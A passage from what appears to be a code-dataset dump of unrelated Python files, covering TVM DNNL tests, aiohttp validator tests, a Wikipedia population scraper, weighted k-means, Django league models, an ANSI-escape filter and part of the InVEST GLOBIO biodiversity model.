    dense, dic, param_lst = get_dense(x_shape=x_shape, k_shape=k_shape, dtype=dtype)
    bias = relay.var("bias", shape=(k_shape[0],), dtype=dtype)
    out = relay.nn.bias_add(dense, bias)
    dic["bias"] = (k_shape[0],)
    param_lst += ["bias"]
    return out, dic, param_lst
def test_dnnl_not_compatible(run_module, target="llvm", dtype="float32"):
    """A graph containing ops DNNL cannot offload (cast) must still build and
    run after partitioning."""
    xshape = (1, 32, 14, 14)
    x_data = np.random.uniform(-1, 1, xshape).astype(dtype)
    x = relay.var("x", shape=(xshape), dtype=dtype)
    y = relay.add(x, x)
    z = relay.cast(relay.cast(y, "int32"), "float32")
    out = relay.nn.relu(z)
    f = relay.Function([x], out)
    mod = tvm.IRModule()
    mod["main"] = f
    mod = dnnl.partition_for_dnnl(mod)
    for mode in ["graph", "vm"]:
        with tvm.transform.PassContext(opt_level=3):
            func = relay.create_executor(mode, mod=mod, device=tvm.cpu(0), target=target).evaluate()
        if run_module:
            results = func(x_data)

def test_multiple_outputs(run_module, dtype="float32"):
    """Tuple-returning graph: both outputs must match with and without DNNL."""
    def get_graph():
        x = relay.var("x", shape=(1, 3), dtype=dtype)
        y = relay.var("y", shape=(1, 3), dtype=dtype)
        z = relay.add(x, y)
        w = relay.add(z, y)
        out = relay.Tuple((z, w))
        f = tvm.IRModule.from_expr(out)
        return f, {"x": (1, 3), "y": (1, 3)}, []
    run_and_verify_func(get_graph(), run_module=run_module, dtype=dtype)

def test_unary(run_module):
    """Element-wise unary ops handled by the DNNL backend."""
    def get_graph(op, x_shape=(1, 8, 3, 3)):
        x = relay.var("x", shape=(x_shape), dtype="float32")
        out = op(x)
        f = tvm.IRModule.from_expr(out)
        return f, {"x": x_shape}, []
    for op in [
        relay.nn.relu,
        relay.tanh,
        relay.sigmoid,
    ]:
        run_and_verify_func(get_graph(op), run_module=run_module)
def test_conv2d(run_module, dtype="float32"):
    """Sweep conv2d configurations: normal and depthwise (groups=32),
    padding, strides and dilation combinations."""
    x_shape = (1, 32, 8, 8)
    for k_shape, groups in [((16, 32, 3, 3), 1), ((32, 1, 3, 3), 32)]:
        for padding in [(0, 0), (1, 1)]:
            for strides in [(1, 1), (2, 2)]:
                for dilation in [(1, 1), (2, 2)]:
                    conv2d, dic, param_lst = get_conv2d(
                        x_shape=x_shape,
                        k_shape=k_shape,
                        groups=groups,
                        padding=padding,
                        strides=strides,
                        dilation=dilation,
                        dtype=dtype,
                    )
                    conv2d = tvm.IRModule.from_expr(conv2d)
                    config = conv2d, dic, param_lst
                    run_and_verify_func(config, run_module=run_module, dtype=dtype)

def test_conv2d_weights_const(run_module, dtype="float32"):
    """conv2d with a constant (foldable) kernel."""
    x_shape = (1, 32, 8, 8)
    k_shape = (16, 32, 3, 3)
    conv2d, dic, param_lst = get_conv2d_weights_const(x_shape, k_shape, dtype=dtype)
    conv2d = tvm.IRModule.from_expr(conv2d)
    config = conv2d, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)

def test_conv2d_pattern(run_module, dtype="float32"):
    """conv2d [+bias] [+activation] fusion patterns, plus conv+bias+BN+relu."""
    x_shape = (1, 32, 8, 8)
    k_shape = (16, 32, 3, 3)
    activation_lst = [None, "relu", "tanh", "sigmoid"]
    for a in activation_lst:
        conv2d, dic, param_lst = get_conv2d(x_shape, k_shape, activation=a, dtype=dtype)
        conv2d = tvm.IRModule.from_expr(conv2d)
        config = conv2d, dic, param_lst
        run_and_verify_func(config, run_module=run_module, dtype=dtype)
        conv2d_bias, dic, param_lst = get_conv2d_bias(x_shape, k_shape, activation=a, dtype=dtype)
        conv2d_bias = tvm.IRModule.from_expr(conv2d_bias)
        config = conv2d_bias, dic, param_lst
        run_and_verify_func(config, run_module=run_module, dtype=dtype)
    conv2d_bias_bn_relu, dic, param_lst = get_conv2d_bias_bn_relu(x_shape, k_shape, dtype=dtype)
    conv2d_bias_bn_relu = tvm.IRModule.from_expr(conv2d_bias_bn_relu)
    config = conv2d_bias_bn_relu, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)
def test_dense(run_module, dtype="float32"):
    """Plain dense, including the degenerate single-output-unit kernel."""
    x_shape = (1, 16)
    k_shape = (32, 16)
    dense, dic, param_lst = get_dense(x_shape, k_shape, dtype=dtype)
    dense = tvm.IRModule.from_expr(dense)
    config = dense, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)
    dense, dic, param_lst = get_dense(x_shape, k_shape=(1, 16), dtype=dtype)
    dense = tvm.IRModule.from_expr(dense)
    config = dense, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)

def test_dense_pattern(run_module, dtype="float32"):
    """Dense and dense+bias fusion patterns."""
    x_shape = (1, 16)
    k_shape = (32, 16)
    dense, dic, param_lst = get_dense(x_shape, k_shape, dtype=dtype)
    dense = tvm.IRModule.from_expr(dense)
    config = dense, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)
    dense_bias, dic, param_lst = get_dense_bias(x_shape, k_shape, dtype=dtype)
    dense_bias = tvm.IRModule.from_expr(dense_bias)
    config = dense_bias, dic, param_lst
    run_and_verify_func(config, run_module=run_module, dtype=dtype)

if __name__ == "__main__":
    # Allow running this test file directly: forward CLI args to pytest.
    import sys
    sys.exit(pytest.main([__file__] + sys.argv[1:]))
| StarcoderdataPython |
def solution(A, B, K):
    """Count the multiples of K in the half-open range [A, B).

    Equivalent to the original ``for i in range(A, B): if i % K == 0`` loop
    but O(1): floor((B-1)/K) - floor((A-1)/K) counts multiples in [A, B-1].
    Python's floor division makes this correct for A == 0 as well (0 counts
    as a multiple of every K).  Assumes K >= 1; returns 0 for an empty range.
    """
    if A >= B:
        return 0
    return (B - 1) // K - (A - 1) // K

solution(6, 11, 2)
1751444 | import asyncio
import json
import pytest
from aiohttp import web
from aiovalidator import (
IntegerField,
middleware_exception,
validator_factory,
abort)
@asyncio.coroutine
def foo_validator_async(value):
    """Coroutine field validator used by ViewTest: doubles the parsed value.

    NOTE(review): ``asyncio.coroutine`` was removed in Python 3.11 -- this
    module only runs on older interpreters.
    """
    return value * 2

def foo_default_async(value):
    """Return a zero-argument coroutine default factory yielding ``value * 2``."""
    @asyncio.coroutine
    def default():
        return value * 2
    return default
def foo_default(value):
    """Return a zero-argument default factory yielding ``value * 2`` (sync variant)."""
    def default():
        # Computed lazily, mirroring foo_default_async.
        return value * 2
    factory = default
    return factory
class ViewTest(web.View):
    """Main test view: the validator middleware parses the ``Field``
    declarations and exposes validated values as ``self.request['fields']``."""
    class Field:
        # Parsed from the URL path component ({user_id}).
        user_id = IntegerField()
        # Restricted to GET/POST; coroutine validator doubles the value.
        field1 = IntegerField(methods={'GET', 'POST'},
                              validator=foo_validator_async)
        # Plain (synchronous) lambda validator, despite the name.
        field1_async = IntegerField(validator=(lambda x: x * 2))
        # Optional with a coroutine default factory; GET only.
        field2 = IntegerField(default=foo_default_async(6), methods={'GET'})
        # Optional with a synchronous default factory.
        field2_async = IntegerField(default=foo_default(6))
        # Optional with a plain default value.
        field4 = IntegerField(default=123)

    @asyncio.coroutine
    def get(self):
        # Echo the validated field mapping back as JSON.
        return web.json_response(self.request['fields'])

    @asyncio.coroutine
    def post(self):
        return web.json_response(self.request['fields'])

    @asyncio.coroutine
    def put(self):
        # ``fields`` also supports attribute-style access (see .user_id).
        return web.json_response(self.request['fields'].user_id)
class ViewTestSkip(web.View):
    """View that opts out of validation via ``skip_validate``; its Field
    declaration is never processed."""
    skip_validate = True
    class Field:
        user_id = IntegerField(default=0)

    @asyncio.coroutine
    def get(self):
        return web.json_response(None)

class ViewTestNotField(web.View):
    """View with no ``Field`` declaration at all."""
    @asyncio.coroutine
    def get(self):
        return web.json_response(None)

class ViewTestAbort(web.View):
    """View that raises via ``abort``; the exception middleware should turn
    it into a JSON error response."""
    @asyncio.coroutine
    def get(self):
        raise abort(status=406, text='error')
@pytest.fixture
def cli(loop, test_client):
    """aiohttp test client with the validator and exception middlewares.

    Route order matters: the catch-all ``/{user_id}`` route is registered
    last so the literal routes (/skip, /not_field, /abort) take precedence.
    """
    app = web.Application(loop=loop,
                          middlewares=[validator_factory(),
                                       middleware_exception])
    app.router.add_route('*', '/skip', ViewTestSkip)
    app.router.add_route('*', '/not_field', ViewTestNotField)
    app.router.add_route('*', '/abort', ViewTestAbort)
    app.router.add_route('*', '/{user_id}', ViewTest)
    return loop.run_until_complete(test_client(app))
@asyncio.coroutine
def test_client_field(cli):
    # GET: validators double field1/field1_async, defaults fill the rest.
    resp = yield from cli.get('/123?field1=6&field1_async=6')
    assert (yield from resp.json()) == {
        'user_id': 123,
        'field1': 12,
        'field1_async': 12,
        'field2': 12,
        'field2_async': 12,
        'field4': 123,
    }

@asyncio.coroutine
def test_client_field_post(cli):
    # POST: body fields override defaults; field2 is GET-only so it is absent.
    data = {
        'field1_async': 2,
        'field4': 5
    }
    resp = yield from cli.post('/123?field1=6', data=json.dumps(data))
    assert (yield from resp.json()) == {
        'user_id': 123,
        'field1': 12,
        'field1_async': 4,
        'field2_async': 12,
        'field4': 5,
    }

@asyncio.coroutine
def test_client_field_put(cli):
    # PUT: attribute-style access returns a single validated field.
    resp = yield from cli.put('/123?field1=6&field1_async=6')
    assert (yield from resp.json()) == 123

@asyncio.coroutine
def test_client_field_skip(cli):
    # skip_validate views bypass the middleware entirely.
    resp = yield from cli.get('/skip')
    assert (yield from resp.json()) is None

@asyncio.coroutine
def test_client_field_not_field(cli):
    # Views without a Field declaration are also left untouched.
    resp = yield from cli.get('/not_field')
    assert (yield from resp.json()) is None

@asyncio.coroutine
def test_client_field_required(cli):
    # Missing required fields produce a JSON error naming the field.
    resp = yield from cli.get('/123')
    assert (yield from resp.json()) == {'message': 'Field field1 required'}
    resp = yield from cli.get('/123?field1=123')
    assert (yield from resp.json()) == {
        'message': 'Field field1_async required'}

@asyncio.coroutine
def test_client_field_abort(cli):
    # abort() is converted to a JSON error by middleware_exception.
    resp = yield from cli.get('/abort')
    assert (yield from resp.json()) == {'message': 'error'}
125315 | from countryinfo import countries
import json
from urllib.parse import quote,unquote
import requests
from time import sleep
from bs4 import BeautifulSoup
import re
def recode_countryinfo():
    """Percent-decode (unquote) the bundled ``countries`` entries -- some
    names/capitals are URL-encoded -- and write the cleaned list to
    ``data.json`` so it can be copied back into ``countryinfo.py``."""
    res = []
    for country in countries:
        c = {
            'name': unquote(country['name']),
            'code': country['code'],
            'capital': unquote(country['capital']),
            'continent': country['continent'],
            'timezones': country['timezones']
        }
        res.append(c)
    with open('data.json', 'w', encoding='utf-8') as outfile:
        json.dump(res, outfile, ensure_ascii=False, indent=4)
def read_countries_from_wikipedia():
    """Fetch each country's Wikipedia article and cache it under wiki-countries/.

    Wikipedia discourages crawling; the volume here is small, results are
    cached locally, and a sleep throttles the requests.
    """
    for country in countries:
        # if not country['name'] in ('Macedonia'):
        #     print("-><- ")
        #     continue
        # Special-case entries whose article title differs from the stored name.
        if country['name'] == 'Macedonia':
            country_name = quote('North Macedonia')
        elif country['name'] == 'Palestine':
            country_name = quote('State of Palestine')
        else:
            country_name = quote(country['name'])
        url = f"https://en.wikipedia.org/wiki/{country_name}"
        print(f"{country['name']} -> {url}")
        buf = requests.get(url)
        # Disambiguation pages ("X usually refers to:") -> retry "<X> (country)".
        refers_re = re.compile(country['name'] + r".*usually refers to:", re.IGNORECASE)
        if refers_re.search(buf.text):
            # ie for Georgia
            url = f"https://en.wikipedia.org/wiki/{country_name}_(country)"
            print(f"{country['name']} --> {url}")
            buf = requests.get(url)
        if "Wikipedia does not have an article with this exact name" in buf.text:
            raise Exception(f"failed to fetch {country['name']} -> {url}")
        with open(f"wiki-countries/{country['name']}.html", 'w', encoding='utf-8') as outfile:
            outfile.write(buf.text)
        sleep(3)
def load_data_from_wiki_files_to_countryinfo():
    """Parse the cached Wikipedia pages and attach ``population`` to each
    entry of ``countries``, then dump the enriched list to data.json."""
    for country in countries:
        print(f"{country['name']}")
        # country_name = quote(country['name'])
        # if not country['name'] in ('Macedonia'):
        #     print("-><- ")
        #     continue
        with open(f"wiki-countries/{country['name']}.html", 'r', encoding='utf-8') as infile:
            content = "\n".join(infile.readlines())
        soup = BeautifulSoup(content, 'html.parser')
        population = read_population(soup)
        print(f"population: {population}")
        country['population'] = population
    with open('data.json', 'w', encoding='utf-8') as outfile:
        json.dump(countries, outfile, ensure_ascii=False, indent=4)
def read_population(soup):
    """Extract the population figure from a parsed Wikipedia country page.

    Returns the population as an int, or None when no figure can be located.
    The traversal mirrors the two infobox layouts seen in practice (the
    "Population" label as a link vs. as a plain table header); it is a
    heuristic over the BeautifulSoup sibling structure -- callers must
    handle None.
    """
    result = soup.find('a', string='Population')
    if result is None:
        result = soup.find('th', string='Population')
        if result is None:
            return None
        # Value may sit in the next <td> sibling, or in the following row.
        if result.nextSibling is not None and result.nextSibling.__dict__.get('name', '') == 'td':
            result = result.nextSibling.text
        else:
            try:
                result = result.parent.nextSibling
                result = result.find('td').text
            except AttributeError:
                return None
    else:
        # Label is a link: the figure lives in the row after the label's row.
        result = result.parent.parent.nextSibling
        result = result.find('td').text
    # First run of digits/commas/spaces is taken as the population figure.
    num_re = re.compile(r"[0-9 \,]+", re.IGNORECASE)
    match = num_re.search(result)
    if match:
        num = match.group(0)
    else:
        return None
    return int(num.replace(",", ""))
#
#
# def read_gdp(soup):
# """Read GDP per capita for provided coutry"""
# result = soup.find('a', string='GDP')
# if result is None:
# result = soup.find('th', string='GDP')
# if result is None:
# return None
# if result.nextSibling is not None and result.nextSibling.__dict__.get('name', '') == 'td':
# result = result.nextSibling.text
# else:
# result = result.parent.nextSibling
# result = result.find('td').text
# else:
# result = result.parent.parent.nextSibling
# result = result.find('td').text
# num_re = re.compile(r"[0-9 \,]+", re.IGNORECASE)
# match = num_re.search(result)
# if match:
# num = match.group(0)
# else:
# return None
# return int(num.replace(",", ""))
if __name__ == "__main__":
    # The crawl step is one-time; re-enable it to refresh the cached pages.
    #read_countries_from_wikipedia()
    load_data_from_wiki_files_to_countryinfo()
| StarcoderdataPython |
45213 | # Based on: https://towardsdatascience.com/clustering-the-us-population-observation-weighted-k-means-f4d58b370002
import random
import numpy as np
import scipy.spatial
def distance(p1, p2):
    """Euclidean distance between points *p1* and *p2*.

    Bug fix: the original ``np.linalg.norm(p1, p2)`` passed *p2* as the
    ``ord`` argument (the norm order), not as a second point; the intended
    value is the norm of the difference vector.
    """
    return np.linalg.norm(np.asarray(p1) - np.asarray(p2))
def cluster_centroids(data, weights, clusters, k):
    """Return the k observation-weighted centroids.

    Parameters: data (n, d) array, weights (n,) array, clusters (n,) integer
    labels in [0, k), k number of clusters.  A cluster with no members (or
    zero total weight) raises ZeroDivisionError from np.average.
    """
    results = []
    for i in range(k):
        members = clusters == i
        results.append(np.average(data[members], weights=weights[members], axis=0))
    return np.array(results)


def kmeans(data, weights, k, steps=20):
    """Observation-weighted k-means with Forgy initialization.

    Returns (clusters, centroids): per-point integer labels and the (k, d)
    centroid array.  Stops early when the centroids stop moving.
    """
    if np.shape(data)[0] != np.shape(weights)[0]:
        # Bug fix: this was a Python 2 print *statement*, a syntax error on
        # Python 3; the parenthesized form works on both 2 and 3.
        print("Dimension data and weights don't match")
    # Forgy initialization method: choose k data points randomly.
    centroids = data[np.random.choice(np.arange(len(data)), k, False)]
    for _ in range(max(steps, 1)):
        dists = scipy.spatial.distance.cdist(centroids, data, 'euclidean')
        # Index of the closest centroid to each data point.
        clusters = np.argmin(dists, axis=0)
        new_centroids = cluster_centroids(data, weights, clusters, k)
        if np.array_equal(new_centroids, centroids):
            break
        centroids = new_centroids
    return clusters, centroids
| StarcoderdataPython |
25873 | <filename>score/models.py<gh_stars>1-10
from django.db import models
from django.contrib.auth.models import User
from solo.models import SingletonModel
class Division(models.Model):
    """A league division."""
    nom = models.CharField(max_length=30)

    def __str__(self):
        return self.nom

class Equipe(models.Model):
    """A team, attached to a Division."""
    nom = models.CharField(max_length=100)
    # NOTE(review): ForeignKey without on_delete -- this model requires Django < 2.0.
    division = models.ForeignKey(
        Division,
        verbose_name='Division'
    )

    def __str__(self):
        return '{} ({})'.format(self.nom, self.division)
class Rencontre(models.Model):
    """A match (fixture) between a home team and an away team."""
    numero = models.IntegerField()
    date = models.DateField()
    heure = models.TimeField()
    equipeDom = models.ForeignKey(
        Equipe,
        # Explicit on_delete is required since Django 2.0; CASCADE is the
        # implicit default of earlier versions, so behavior is unchanged.
        on_delete=models.CASCADE,
        related_name='rencontreDom',
        verbose_name='Equipe Domicile'
    )
    equipeExt = models.ForeignKey(
        Equipe,
        on_delete=models.CASCADE,
        related_name='rencontreExt',
        verbose_name='Equipe Exterieur'
    )
    # Scores stay NULL/blank until the match has actually been played.
    scoreDom = models.IntegerField(
        verbose_name='Score Domicile',
        null=True,
        blank=True
    )
    scoreExt = models.IntegerField(
        verbose_name='Score Exterieur',
        null=True,
        blank=True
    )
    forfaitDom = models.BooleanField(
        verbose_name='Forfait Domicile',
        default=False
    )
    forfaitExt = models.BooleanField(
        verbose_name='Forfait Exterieur',
        default=False
    )
    def __str__(self):
        return str(self.numero)
class Profil(models.Model):
    """Extra per-user data: the teams a user follows."""
    user = models.OneToOneField(
        User,
        # Explicit on_delete is required since Django 2.0; CASCADE is the
        # implicit default of earlier versions, so behavior is unchanged.
        on_delete=models.CASCADE,
        verbose_name='Utilisateur'
    )
    equipes = models.ManyToManyField(Equipe)
    def __str__(self):
        return self.user.username
class SiteConfiguration(SingletonModel):
    """Singleton holding the credentials used by the site.

    NOTE(review): the short max_length values (7 and 8) look tailored to
    a specific upstream credential format -- confirm before widening.
    """
    login = models.CharField(max_length=7, verbose_name='Identifiant')
    password = models.CharField(max_length=8, verbose_name='Mot de passe')
    username = models.CharField(max_length=20, verbose_name='Nom utilisateur')
    class Meta:
        verbose_name = "Site Configuration"
| StarcoderdataPython |
3397516 | <reponame>coveooss/coveo-python-oss<filename>coveo-systools/coveo_systools/streams.py
import re
# Matches 7-bit and 8-bit C1 ANSI escape sequences. This is a *bytes*
# pattern (not str): it scrubs terminal control codes out of captured
# console output before further processing.
# Source: https://stackoverflow.com/a/14693789/1741414
ANSI_ESCAPE_8BIT = re.compile(
    br"""
    (?: # either 7-bit C1, two bytes, ESC Fe (omitting CSI)
        \x1B
        [@-Z\\-_]
    |   # or a single 8-bit byte Fe (omitting CSI)
        [\x80-\x9A\x9C-\x9F]
    |   # or CSI + control codes
        (?: # 7-bit CSI, ESC [
            \x1B\[
        |   # 8-bit CSI, 9B
            \x9B
        )
        [0-?]*  # Parameter bytes
        [ -/]*  # Intermediate bytes
        [@-~]   # Final byte
    )
    """,
    re.VERBOSE,
)
def filter_ansi(stream: bytes) -> bytes:
    """Return *stream* with every ANSI escape sequence stripped out."""
    # re.sub on a bytes pattern already yields bytes; no extra copy needed.
    return ANSI_ESCAPE_8BIT.sub(b"", stream)
| StarcoderdataPython |
3254737 | <reponame>hkotaro1215/invest
"""GLOBIO InVEST Model."""
from __future__ import absolute_import
import os
import logging
import collections
import csv
import uuid
from osgeo import gdal
from osgeo import ogr
from osgeo import osr
import numpy
import natcap.invest.pygeoprocessing_0_3_3
from . import utils
from . import validation
LOGGER = logging.getLogger('natcap.invest.globio')
# this value of sigma == 9.0 was derived by <NAME> as a good
# approximation to use as a gaussian filter to replace the connectivity index.
# I don't have any other documentation than his original code base.
SIGMA = 9.0
def execute(args):
    """GLOBIO.
    The model operates in two modes. Mode (a) generates a landcover map
    based on a base landcover map and information about crop yields,
    infrastructure, and more. Mode (b) assumes the globio landcover
    map is generated. These modes are used below to describe input
    parameters.
    Parameters:
        args['workspace_dir'] (string): output directory for intermediate,
            temporary, and final files
        args['predefined_globio'] (boolean): if True then "mode (b)" else
            "mode (a)"
        args['results_suffix'] (string): (optional) string to append to any
            output files
        args['lulc_uri'] (string): used in "mode (a)" path to a base landcover
            map with integer codes
        args['lulc_to_globio_table_uri'] (string): used in "mode (a)" path to
            table that translates the land-cover args['lulc_uri'] to
            intermediate GLOBIO classes, from which they will be further
            differentiated using the additional data in the model. Contains
            at least the following fields:
            * 'lucode': Land use and land cover class code of the dataset
                used. LULC codes match the 'values' column in the LULC
                raster of mode (b) and must be numeric and unique.
            * 'globio_lucode': The LULC code corresponding to the GLOBIO class
                to which it should be converted, using intermediate codes
                described in the example below.
        args['infrastructure_dir'] (string): used in "mode (a) and (b)" a path
            to a folder containing maps of either gdal compatible rasters or
            OGR compatible shapefiles. These data will be used in the
            infrastructure to calculation of MSA.
        args['pasture_uri'] (string): used in "mode (a)" path to pasture raster
        args['potential_vegetation_uri'] (string): used in "mode (a)" path to
            potential vegetation raster
        args['pasture_threshold'] (float): used in "mode (a)"
        args['intensification_fraction'] (float): used in "mode (a)"; a value
            between 0 and 1 denoting proportion of total agriculture that
            should be classified as 'high input'
        args['primary_threshold'] (float): used in "mode (a)"
        args['msa_parameters_uri'] (string): path to MSA classification
            parameters
        args['aoi_uri'] (string): (optional) if it exists then final MSA raster
            is summarized by AOI
        args['globio_lulc_uri'] (string): used in "mode (b)" path to predefined
            globio raster.
    Returns:
        None
    """
    msa_parameter_table = load_msa_parameter_table(
        args['msa_parameters_uri'], float(args['intensification_fraction']))
    file_suffix = utils.make_suffix_string(args, 'results_suffix')
    output_dir = os.path.join(args['workspace_dir'])
    intermediate_dir = os.path.join(
        args['workspace_dir'], 'intermediate_outputs')
    tmp_dir = os.path.join(args['workspace_dir'], 'tmp')
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.create_directories(
        [output_dir, intermediate_dir, tmp_dir])
    # cell size should be based on the landcover map
    if not args['predefined_globio']:
        # mode (a): derive the GLOBIO landcover from the base LULC
        out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
            args['lulc_uri'])
        globio_lulc_uri = _calculate_globio_lulc_map(
            args['lulc_to_globio_table_uri'], args['lulc_uri'],
            args['potential_vegetation_uri'], args['pasture_uri'],
            float(args['pasture_threshold']), float(args['primary_threshold']),
            file_suffix, intermediate_dir, tmp_dir, out_pixel_size)
    else:
        # mode (b): the GLOBIO landcover is supplied directly
        out_pixel_size = natcap.invest.pygeoprocessing_0_3_3.geoprocessing.get_cell_size_from_uri(
            args['globio_lulc_uri'])
        LOGGER.info('no need to calculate GLOBIO LULC because it is passed in')
        globio_lulc_uri = args['globio_lulc_uri']
    globio_nodata = natcap.invest.pygeoprocessing_0_3_3.get_nodata_from_uri(globio_lulc_uri)
    # Collapse every raster/shapefile in the infrastructure directory into
    # a single combined mask aligned with the GLOBIO landcover.
    infrastructure_uri = os.path.join(
        intermediate_dir, 'combined_infrastructure%s.tif' % file_suffix)
    _collapse_infrastructure_layers(
        args['infrastructure_dir'], globio_lulc_uri, infrastructure_uri)
    # calc_msa_f: MSA due to fragmentation of primary vegetation
    primary_veg_mask_uri = os.path.join(
        tmp_dir, 'primary_veg_mask%s.tif' % file_suffix)
    primary_veg_mask_nodata = -1
    def _primary_veg_mask_op(lulc_array):
        """Masking out natural areas."""
        nodata_mask = lulc_array == globio_nodata
        # landcover type 1 in the GLOBIO schema represents primary vegetation
        result = (lulc_array == 1)
        return numpy.where(nodata_mask, primary_veg_mask_nodata, result)
    LOGGER.info("create mask of primary veg areas")
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [globio_lulc_uri], _primary_veg_mask_op,
        primary_veg_mask_uri, gdal.GDT_Int32, primary_veg_mask_nodata,
        out_pixel_size, "intersection", dataset_to_align_index=0,
        vectorize_op=False)
    LOGGER.info('gaussian filter primary veg')
    # SIGMA-wide gaussian blur approximates the connectivity index (see
    # module-level comment on SIGMA).
    gaussian_kernel_uri = os.path.join(
        tmp_dir, 'gaussian_kernel%s.tif' % file_suffix)
    make_gaussian_kernel_uri(SIGMA, gaussian_kernel_uri)
    smoothed_primary_veg_mask_uri = os.path.join(
        tmp_dir, 'smoothed_primary_veg_mask%s.tif' % file_suffix)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.convolve_2d_uri(
        primary_veg_mask_uri, gaussian_kernel_uri,
        smoothed_primary_veg_mask_uri)
    primary_veg_smooth_uri = os.path.join(
        intermediate_dir, 'primary_veg_smooth%s.tif' % file_suffix)
    def _primary_veg_smooth_op(
            primary_veg_mask_array, smoothed_primary_veg_mask):
        """Mask out ffqi only where there's an ffqi."""
        return numpy.where(
            primary_veg_mask_array != primary_veg_mask_nodata,
            primary_veg_mask_array * smoothed_primary_veg_mask,
            primary_veg_mask_nodata)
    LOGGER.info('calculate primary_veg_smooth')
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [primary_veg_mask_uri, smoothed_primary_veg_mask_uri],
        _primary_veg_smooth_op, primary_veg_smooth_uri, gdal.GDT_Float32,
        primary_veg_mask_nodata, out_pixel_size, "intersection",
        dataset_to_align_index=0, vectorize_op=False)
    msa_nodata = -1
    msa_f_table = msa_parameter_table['msa_f']
    msa_f_values = sorted(msa_f_table)
    def _msa_f_op(primary_veg_smooth):
        """Calculate msa fragmentation."""
        nodata_mask = primary_veg_mask_nodata == primary_veg_smooth
        msa_f = numpy.empty(primary_veg_smooth.shape)
        # iterate thresholds high-to-low so lower bins overwrite higher ones
        for value in reversed(msa_f_values):
            # special case if it's a > or < value
            if value == '>':
                msa_f[primary_veg_smooth > msa_f_table['>'][0]] = (
                    msa_f_table['>'][1])
            elif value == '<':
                continue
            else:
                msa_f[primary_veg_smooth <= value] = msa_f_table[value]
        if '<' in msa_f_table:
            msa_f[primary_veg_smooth < msa_f_table['<'][0]] = (
                msa_f_table['<'][1])
        msa_f[nodata_mask] = msa_nodata
        return msa_f
    LOGGER.info('calculate msa_f')
    msa_f_uri = os.path.join(output_dir, 'msa_f%s.tif' % file_suffix)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [primary_veg_smooth_uri], _msa_f_op, msa_f_uri, gdal.GDT_Float32,
        msa_nodata, out_pixel_size, "intersection", dataset_to_align_index=0,
        vectorize_op=False)
    # calc_msa_i: MSA due to proximity to infrastructure
    msa_f_values = sorted(msa_f_table)
    msa_i_other_table = msa_parameter_table['msa_i_other']
    msa_i_primary_table = msa_parameter_table['msa_i_primary']
    msa_i_other_values = sorted(msa_i_other_table)
    msa_i_primary_values = sorted(msa_i_primary_table)
    def _msa_i_op(lulc_array, distance_to_infrastructure):
        """Calculate msa infrastructure."""
        distance_to_infrastructure *= out_pixel_size  # convert to meters
        msa_i_primary = numpy.empty(lulc_array.shape)
        msa_i_other = numpy.empty(lulc_array.shape)
        for value in reversed(msa_i_primary_values):
            # special case if it's a > or < value
            if value == '>':
                msa_i_primary[distance_to_infrastructure >
                              msa_i_primary_table['>'][0]] = (
                                  msa_i_primary_table['>'][1])
            elif value == '<':
                continue
            else:
                msa_i_primary[distance_to_infrastructure <= value] = (
                    msa_i_primary_table[value])
        if '<' in msa_i_primary_table:
            msa_i_primary[distance_to_infrastructure <
                          msa_i_primary_table['<'][0]] = (
                              msa_i_primary_table['<'][1])
        for value in reversed(msa_i_other_values):
            # special case if it's a > or < value
            if value == '>':
                msa_i_other[distance_to_infrastructure >
                            msa_i_other_table['>'][0]] = (
                                msa_i_other_table['>'][1])
            elif value == '<':
                continue
            else:
                msa_i_other[distance_to_infrastructure <= value] = (
                    msa_i_other_table[value])
        if '<' in msa_i_other_table:
            msa_i_other[distance_to_infrastructure <
                        msa_i_other_table['<'][0]] = (
                            msa_i_other_table['<'][1])
        # primary vegetation (code 1) uses its own distance response curve
        msa_i = numpy.where(lulc_array == 1, msa_i_primary, msa_i_other)
        return msa_i
    LOGGER.info('calculate msa_i')
    distance_to_infrastructure_uri = os.path.join(
        intermediate_dir, 'distance_to_infrastructure%s.tif' % file_suffix)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.distance_transform_edt(
        infrastructure_uri, distance_to_infrastructure_uri)
    msa_i_uri = os.path.join(output_dir, 'msa_i%s.tif' % file_suffix)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [globio_lulc_uri, distance_to_infrastructure_uri], _msa_i_op,
        msa_i_uri, gdal.GDT_Float32, msa_nodata, out_pixel_size,
        "intersection", dataset_to_align_index=0, vectorize_op=False)
    # calc_msa_lu: MSA due to land use, straight reclassification
    msa_lu_uri = os.path.join(
        output_dir, 'msa_lu%s.tif' % file_suffix)
    LOGGER.info('calculate msa_lu')
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.reclassify_dataset_uri(
        globio_lulc_uri, msa_parameter_table['msa_lu'], msa_lu_uri,
        gdal.GDT_Float32, globio_nodata, exception_flag='values_required')
    LOGGER.info('calculate msa')
    msa_uri = os.path.join(
        output_dir, 'msa%s.tif' % file_suffix)
    def _msa_op(msa_f, msa_lu, msa_i):
        """Calculate the MSA which is the product of the sub MSAs."""
        return numpy.where(
            msa_f != globio_nodata, msa_f * msa_lu * msa_i, globio_nodata)
    natcap.invest.pygeoprocessing_0_3_3.geoprocessing.vectorize_datasets(
        [msa_f_uri, msa_lu_uri, msa_i_uri], _msa_op, msa_uri,
        gdal.GDT_Float32, msa_nodata, out_pixel_size, "intersection",
        dataset_to_align_index=0, vectorize_op=False)
    # ensure that aoi_uri is defined and it's not an empty string
    if 'aoi_uri' in args and len(args['aoi_uri']) > 0:
        # copy the aoi to an output shapefile
        original_datasource = gdal.OpenEx(args['aoi_uri'], gdal.OF_VECTOR)
        summary_aoi_uri = os.path.join(
            output_dir, 'aoi_summary%s.shp' % file_suffix)
        # Delete if existing shapefile with the same name
        if os.path.isfile(summary_aoi_uri):
            os.remove(summary_aoi_uri)
        # Copy the input shapefile into the designated output folder
